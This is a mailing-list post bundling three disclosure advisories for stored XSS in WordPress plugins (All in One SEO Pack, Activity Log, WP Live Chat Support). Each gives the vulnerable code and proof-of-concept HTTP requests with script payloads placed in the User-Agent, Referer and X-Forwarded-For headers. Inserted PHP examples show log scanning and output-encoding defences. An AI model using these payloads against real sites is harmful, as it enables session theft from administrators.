Date: Sun, 17 Jul 2016 09:59:27 +0200
From: Summer of Pwnage <lists@...urify.nl>
To: oss-security@...ts.openwall.com
Subject: Multiple stored Cross-Site Scripting vulnerabilities affecting three WordPress Plugins

Please see attached advisories for more information. These issues were 
found during Summer of Pwnage (https://sumofpwn.nl), a Dutch community 
project. Its goal is to contribute to the security of popular, widely 
used OSS projects in a fun and educational way.


------------------------------------------------------------------------
Persistent Cross-Site Scripting in All in One SEO Pack WordPress Plugin
------------------------------------------------------------------------
David Vaartjes, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability was found in the Bot Blocker
functionality of the All in One SEO Pack WordPress Plugin (1+ million
active installs). This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0027

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on the All in One SEO Pack [2]
WordPress Plugin version 2.3.6.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 2.3.7 of the plugin.

Free version https://wordpress.org/plugins/all-in-one-seo-pack/
Pro version https://semperplugins.com/all-in-one-seo-pack-pro-version/

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
All in One SEO Pack [2] is reportedly the most downloaded plugin for
WordPress. It allows users to automatically optimize their site for
Search Engines. A stored Cross-Site Scripting vulnerability exists in
the Bot Blocker functionality.


------------------------------------------------------------------------
Details
------------------------------------------------------------------------
A stored Cross-Site Scripting vulnerability exists in the Bot Blocker
functionality of the All in One SEO Pack WordPress Plugin (1+ million
active installs). What makes this issue notable is that an anonymous
user can store an XSS payload in the Admin dashboard simply by visiting
the public site with a crafted User-Agent or Referer header.

The SEO Pack Bot Blocker functionality can be used to prevent certain
bots from accessing/crawling the website. Bots are detected based on
User-Agent and Referer header patterns. When the User-Agent contains one
of the pre-configured bot names, like "Abonti", "Bullseye" or "Exabot",
the request is blocked and a 404 is returned.

If the "Track Blocked Bots" setting is enabled (it is not by default),
blocked requests are logged to that settings page's HTML without
sanitization or output encoding, allowing XSS.

The affected resource (the lines marked "->" are those that take the raw
header values):
/all-in-one-seo-pack/modules/aioseop_bad_robots.php

if ( $this->option_isset( 'block_bots' ) ) {
	if ( !$this->allow_bot() ) {
		status_header( 503 );
		$ip = $_SERVER['REMOTE_ADDR'];
->		$user_agent = $_SERVER['HTTP_USER_AGENT'];
->		$this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched user agent %s found in blocklist.", 'all-in-one-seo-pack' ), $ip, $user_agent ) );
		exit();
	} elseif ( $this->option_isset( 'block_refer' ) && $this->is_bad_referer() ) {
		status_header( 503 );
		$ip = $_SERVER['REMOTE_ADDR'];
->		$referer = $_SERVER['HTTP_REFERER'];
->		$this->blocked_message( sprintf( __( "Blocked bot with IP %s -- matched referer %s found in blocklist.", 'all-in-one-seo-pack' ), $ip, $referer ) );
	}
}


The resulting HTML code:

<span class="aioseop_option_input"><div class="aioseop_option_div"
><pre>2016-07-05 18:59:37 Blocked bot with IP 172.16.232.1 -- matched
user agent Abonti </pre><script>alert(1);</script>found in blocklist.



------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
1/ Go to the "Bad Bot Blocker" settings page in the All in One SEO menu.
2/ Enable "Block Bad Bots using HTTP" and/or "Block Referral Spam using
HTTP".
3/ Send the exploit request (with the payload in the Referer or User-Agent
header) to the server; any URL will do. Make sure to send the request as
an anonymous user: when you are logged in (have cookies), you are never
treated as a bot.
4/ If everything is set up correctly, the request is blocked (HTTP/1.1 503
Service Unavailable).
5/ Open the "Bad Bot Blocker" settings page as WP admin.
6/ The payload runs, since it is logged inside a <pre> tag.

Optionally, use the "Track Blocked Bots" setting to show/hide the <pre>
block; it is not needed for the payload to run. The payload can be placed
in either the User-Agent or the Referer header.

REQUEST:

GET / HTTP/1.1
Host: 172.16.232.130
User-Agent: Abonti </pre><script>alert(1);</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.232.130/</pre><script>alert(1);</script>
Connection: close
Cache-Control: max-age=0

RESPONSE:

HTTP/1.1 503 Service Unavailable
Date: Tue, 05 Jul 2016 19:31:19 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8
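A defender-side check to go with the request and response above, added here as an example and not part of the advisory or of the plugin: it scans Apache combined-format access log lines for User-Agent and Referer values that carry markup, which is the delivery vector of this issue and of the Referer-based WP Live Chat Support issue further down. The log lines, addresses and timestamps are constructed for this example; only the two header values echo the request shown above.

```php
<?php
// Added example: a defender-side scan of web-server access logs for request
// headers that carry markup. This is not the advisory's or the plugin's code.
// The log lines are constructed for this example. Apache's default "combined"
// format records Referer and User-Agent; X-Forwarded-For is only logged when
// the LogFormat adds %{X-Forwarded-For}i, so that vector needs a custom format.

const SAMPLE_LOG = <<<'LOG'
172.16.232.1 - - [05/Jul/2016:19:31:19 +0000] "GET / HTTP/1.1" 503 0 "http://172.16.232.130/</pre><script>alert(1);</script>" "Abonti </pre><script>alert(1);</script>"
192.168.28.1 - - [05/Jul/2016:19:31:20 +0000] "GET /about/ HTTP/1.1" 200 5123 "https://www.example.com/" "Mozilla/5.0 (X11; Linux x86_64) Firefox/47.0"
192.168.28.1 - - [05/Jul/2016:19:31:21 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 12 "http://192.168.28.129/'\"><img src=x onerror=alert(document.cookie)>/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36"
LOG;

// One combined-format line: ip ident user [time] "request" status bytes
// "referer" "user-agent". Apache writes an embedded quote as \", so each
// quoted field accepts backslash escapes.
const LINE_RE = <<<'RE'
/^(\S+) \S+ \S+ \[([^\]]+)\] "((?:[^"\\]|\\.)*)" (\d{3}) \S+ "((?:[^"\\]|\\.)*)" "((?:[^"\\]|\\.)*)"/
RE;

// Characters a legitimate User-Agent or Referer never needs but an HTML or
// JavaScript injection does.
const MARKER_RE = '/[<>"\']|javascript:/i';

// Returns one finding per header value that matches MARKER_RE.
function suspicious_header_entries(string $log): array
{
    $findings = [];
    foreach (preg_split('/\R/', trim($log)) as $line) {
        if (!preg_match(LINE_RE, $line, $m)) {
            continue; // not a combined-format line: skip rather than guess
        }
        [, $ip, $time, $request, $status, $referer, $ua] = $m;
        foreach (['Referer' => $referer, 'User-Agent' => $ua] as $field => $raw) {
            $value = stripslashes($raw); // undo Apache's \" escaping
            if (preg_match(MARKER_RE, $value)) {
                $findings[] = [
                    'ip' => $ip, 'time' => $time, 'request' => $request,
                    'status' => (int) $status, 'field' => $field, 'value' => $value,
                ];
            }
        }
    }
    return $findings;
}

// Three of the six header values above are flagged: the Referer and
// User-Agent of the 503-blocked request, and the Referer of the chat POST.
foreach (suspicious_header_entries(SAMPLE_LOG) as $f) {
    printf("[%s] %s %s status=%d %s: %s\n",
        $f['time'], $f['ip'], $f['request'], $f['status'], $f['field'], $f['value']);
}
```

A 503 with a marked-up User-Agent or Referer is exactly what the Bot Blocker produces for a blocked request, so pairing the status code with the header finding separates these attempts from ordinary scanner noise.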

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_all_in_one_seo_pack_wordpress_plugin.html
[2] https://wordpress.org/plugins/all-in-one-seo-pack/
[3] https://semperplugins.com/all-in-one-seo-pack-pro-version/

------------------------------------------------------------------------
Persistent Cross-Site Scripting in WordPress Activity Log plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A stored Cross-Site Scripting (XSS) vulnerability has been found in the
WordPress Activity Log plugin. By using this vulnerability an attacker
can inject malicious JavaScript code into the application, which will
execute within the browser of any user who views the Activity Log,
typically a WP administrator.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0037

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WordPress Activity Log plugin [2]
version 2.3.1.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 2.3.2 of the WordPress Activity Log
plugin. The updated plugin can be downloaded from the following
location:
https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The WordPress Activity Log plugin [2] allows monitoring and tracking of
site activity on a WordPress site. A stored Cross-Site Scripting
vulnerability has been discovered in the WordPress Activity Log plugin
which allows an unauthenticated attacker to inject malicious JavaScript
code into the application, which will execute within the browser of any
user who views the Activity Log (WP admin).

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WordPress Activity Log plugin fails to sufficiently check input
supplied in the X-Forwarded-For HTTP header and to perform output
encoding when that input is presented in a "wrong password" event. As a
result the malicious request is stored in the Activity Log page, and the
payload executes when an unsuspecting user views that page.

An attacker can use this vulnerability to perform a wide variety of
actions, such as stealing victims' session tokens or login credentials,
performing arbitrary actions on their behalf, logging their keystrokes,
or delivering malware.

Persistent Cross-Site scripting flaws are typically more serious than
reflected vulnerabilities because they do not require a separate
delivery mechanism in order to reach target users (victims).
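The two defences this issue calls for, as an added example that is not the Activity Log plugin's code: treat X-Forwarded-For as untrusted input (honour it only behind a trusted proxy, and only when it parses as an IP address), and HTML-encode whatever is stored when the log page is rendered. The TRUSTED_PROXIES list, the addresses and the request arrays are constructed for this example; esc_html() is the WordPress equivalent of the encoder used here.

```php
<?php
// Added example, not the Activity Log plugin's code. Validates the client
// address taken from X-Forwarded-For and encodes it on output.
// TRUSTED_PROXIES and the request arrays are constructed for this example.

const TRUSTED_PROXIES = ['10.0.0.5'];

// Picks the client address to record for an event. $server has the shape of
// PHP's $_SERVER superglobal.
function client_ip_for_log(array $server): string
{
    $remote = $server['REMOTE_ADDR'] ?? '0.0.0.0';
    if (!in_array($remote, TRUSTED_PROXIES, true)) {
        // The peer is not our proxy, so any X-Forwarded-For was written by
        // the client itself and is just text.
        return $remote;
    }
    // A proxy appends the address it saw to the right of whatever the client
    // sent, so the right-most non-proxy entry is the real client; anything
    // left of it is client-supplied.
    $hops = array_reverse(array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR'] ?? '')));
    foreach ($hops as $hop) {
        if (in_array($hop, TRUSTED_PROXIES, true)) {
            continue;
        }
        return filter_var($hop, FILTER_VALIDATE_IP) !== false ? $hop : $remote;
    }
    return $remote;
}

function encode_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Renders one "wrong password" row. Encoding happens here no matter how
// well the value was validated on the way in (esc_html() in WordPress).
function render_failed_login_row(string $username, string $ip): string
{
    return '<tr><td>wrong password</td><td>' . encode_html($username)
         . '</td><td>' . encode_html($ip) . '</td></tr>';
}

$payload = '<script>alert(document.cookie);</script>';

// The advisory's header sent straight to the web server, and the same
// header arriving through the trusted proxy with the real client appended.
$direct  = ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => $payload];
$proxied = ['REMOTE_ADDR' => '10.0.0.5',    'HTTP_X_FORWARDED_FOR' => $payload . ', 203.0.113.7'];

// Both rows record 203.0.113.7; the script tag never reaches storage.
foreach ([$direct, $proxied] as $request) {
    echo render_failed_login_row('wordpress', client_ip_for_log($request)), "\n";
}

// The plugin's behaviour with only the output side fixed: the tag is still
// stored, but the browser shows it as text instead of running it.
echo render_failed_login_row('wordpress', $payload), "\n";
```

Input validation alone is not enough here: an older log entry written before the fix, or a value accepted from a misconfigured proxy, still reaches the admin page, so the encoder at render time is the control that actually closes the XSS.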

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
This vulnerability can be demonstrated by submitting an XFF header
similar to the following:

POST /wp-login.php HTTP/1.1
Host: 192.168.28.135
Content-Length: 113
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5)
AppleWebKit/537.36
(KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
X-Forwarded-For: <script>alert(document.cookie);</script>
Connection: close
 
log=wordpress&pwd=sdsdssdsdsd&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.28.135%2Fwp-admin%2F&testcookie=1

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wordpress_activity_log_plugin.html
[2] https://wordpress.org/plugins/aryo-activity-log/
[3] https://downloads.wordpress.org/plugin/aryo-activity-log.2.3.2.zip

------------------------------------------------------------------------
Persistent Cross-Site Scripting in WP Live Chat Support plugin
------------------------------------------------------------------------
Han Sahin, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A persistent Cross-Site Scripting (XSS) vulnerability has been found in
the WP Live Chat Support plugin. By using this vulnerability an attacker
can inject malicious JavaScript code into the application, which will
execute within the browser of the victim. This allows the attacker to
perform a wide variety of actions on behalf of a logged-on WordPress
user, such as stealing victims' session tokens or login credentials,
performing arbitrary actions on their behalf, and logging their
keystrokes.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160712-0008

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on WP Live Chat Support [2] WordPress
plugin version 6.2.00.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue has been fixed in version 6.2.02 of the WP Live Chat Support
plugin. The updated plugin can be downloaded from the following
location:
https://downloads.wordpress.org/plugin/wp-live-chat-support.zip

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
WP Live Chat Support [2] allows chatting with visitors of a WordPress
site. A persistent Cross-Site Scripting vulnerability has been
discovered in WP Live Chat Support, allowing an attacker to execute
actions on behalf of a logged-on WordPress user.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The WP Live Chat Support plugin uses the Referer header to show backend
(wp-admin) chat users the page on which a chat was initiated. However,
the URL retrieved from the database is not output-encoded for its output
context (JavaScript and HTML). As a result, persistent Cross-Site
Scripting is introduced.

$wpdb->insert(
	$wplc_tblname_chats,
	array(
		'status' => '5',
		'timestamp' => current_time('mysql'),
		'name' => $name,
		'email' => $email,
		'session' => $session,
		'ip' => maybe_serialize($user_data),
		'url' => $_SERVER['HTTP_REFERER'], // raw Referer header stored as-is
		'last_active_timestamp' => current_time('mysql'),
		'other' => maybe_serialize($other),
	),
	array(
		'%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s'
	)
);

The PHP code of the vulnerable output (HTML context) is as follows:

echo "      <span class='part1'>" . __("Chat initiated on:", "wplivechat") . "</span> <span class='part2'>" . $result->url . "</span>";

The JavaScript-context output on the page (the stored URL is concatenated
into markup as a string) is as follows:

</span> <a href='"+v_browsing_url+"' target='_BLANK'>"+v_browsing+"</a><br /><span class='wplc-sub-item-header'>Email:</span> <a href='mailto:"+v_email+"' target='_BLANK'>"+v_email+"</a></span>";
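The fix for both snippets above, and for the Bot Blocker log message in the first advisory, is output encoding chosen per context: HTML text, an href attribute, and a JavaScript string literal each need a different encoder. The following is an added example and not the plugin's code. It uses plain PHP (htmlspecialchars, json_encode, parse_url) so it runs stand-alone and names the WordPress equivalents in comments; the wplc-link container and the inputs at the bottom are constructed for the example.

```php
<?php
// Added example, not the WP Live Chat Support or All in One SEO Pack code.
// Both advisories store a raw request header and later print it; the fix is
// to encode the value for each context it lands in. WordPress equivalents:
// esc_html() for HTML, wp_json_encode() for a JS literal, esc_url() for links.

// HTML text and attribute context.
function for_html(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// JavaScript string-literal context inside a <script> block. The JSON_HEX_*
// flags turn <, >, &, ' and " into \uXXXX escapes, and json_encode escapes
// "/" by default, so neither "</script>" nor a quote can end the literal early.
function for_js_string(string $s): string
{
    $out = json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return $out === false ? '""' : $out; // invalid UTF-8: emit an empty literal
}

// The "page the chat started on" must be a web URL; anything else
// (javascript:, data:, garbage) is dropped so it can never become a link.
function http_url_or_empty(string $url): string
{
    $scheme = parse_url($url, PHP_URL_SCHEME);
    return in_array(strtolower((string) $scheme), ['http', 'https'], true) ? $url : '';
}

// Renders the chat details the way the vulnerable snippets should have:
// encoded in the PHP-emitted HTML, handed to JavaScript as a JSON literal,
// and turned into a link with DOM APIs instead of string-built markup.
// The wplc-link span is a constructed placeholder for this example.
function render_chat_details(string $stored_url): string
{
    $url = http_url_or_empty($stored_url);
    $html  = "<span class='part1'>Chat initiated on:</span> "
           . "<span class='part2'>" . for_html($url) . "</span> "
           . "<span class='wplc-link'></span>\n";
    $html .= "<script>\n"
           . "var v_browsing_url = " . for_js_string($url) . ";\n"
           . "if (v_browsing_url) {\n"
           . "  var link = document.createElement('a');\n"
           . "  link.href = v_browsing_url;\n"
           . "  link.target = '_blank';\n"
           . "  link.textContent = v_browsing_url;\n"
           . "  document.querySelector('.wplc-link').appendChild(link);\n"
           . "}\n"
           . "</script>\n";
    return $html;
}

// The Bot Blocker log line from the first advisory, with the header values
// encoded before they are placed in the trusted format string.
function blocked_message_safe(string $ip, string $user_agent): string
{
    return sprintf("Blocked bot with IP %s -- matched user agent %s found in blocklist.",
                   for_html($ip), for_html($user_agent));
}

// Constructed inputs: the payloads from the advisories plus a javascript: URL.
echo render_chat_details("http://192.168.28.129/'\"><img src=x onerror=alert(document.cookie)>/");
echo render_chat_details('javascript:alert(1)');
echo '<pre>', blocked_message_safe('172.16.232.1', 'Abonti </pre><script>alert(1);</script>'), "</pre>\n";
```

Run it and look at the emitted markup: the img tag appears as &lt;img ... in the span, as \u003Cimg ... inside the JavaScript literal, and the javascript: URL never produces a link at all. The encoder is chosen by where the value is written, not by where it came from, which is why the same for_html() serves the Bot Blocker's <pre> block and the chat page's span.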

The malicious code supplied by an attacker can be used to perform a wide
variety of actions, such as stealing victims' session tokens or login
credentials, performing arbitrary actions on their behalf, and logging
their keystrokes.

Stored Cross-Site Scripting flaws are typically more serious than
reflected vulnerabilities because they do not require a separate
delivery mechanism in order to reach target users. The victim
(potentially even a WP admin) only has to view the wplivechat-menu page,
which is generally the first page shown when the plugin is opened:

http://<wordpress site>/wp-admin/admin.php?page=wplivechat-menu

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
This vulnerability can be demonstrated by intercepting the
wplc_start_chat action after filling in your name and e-mail, and then
replacing the relative path in the Referer header with the Cross-Site
Scripting payload.

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 192.168.28.129
Content-Length: 117
Accept: */*
Origin: http://192.168.28.129
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103
Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://192.168.28.129/'"><img src=x
onerror=alert(document.cookie)>/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,nl;q=0.6
Cookie: wplc_cid=1742; wplc_name=Guest; wplc_email=no%20email%20set;
wplc_chat_status=5; iflychat_guest_id=1467535930we14g;
iflychat_guest_session=320f0212654acf6216884952f5766c7b;
iflychat_guest_name=Guest%20Norene; iflychat_key=undefined;
iflychat_css=undefined; iflychat_time=1467535929896; wplc_hide=
Connection: close
	
action=wplc_start_chat&security=5d2beba087&name=Sahin&email=han.sahin%40securiy.nl&cid=1742&wplcsession=1467535929687

------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1] https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_live_chat_support_plugin.html
[2] https://wordpress.org/plugins/wp-live-chat-support/
[3] https://downloads.wordpress.org/plugin/wp-live-chat-support.zip
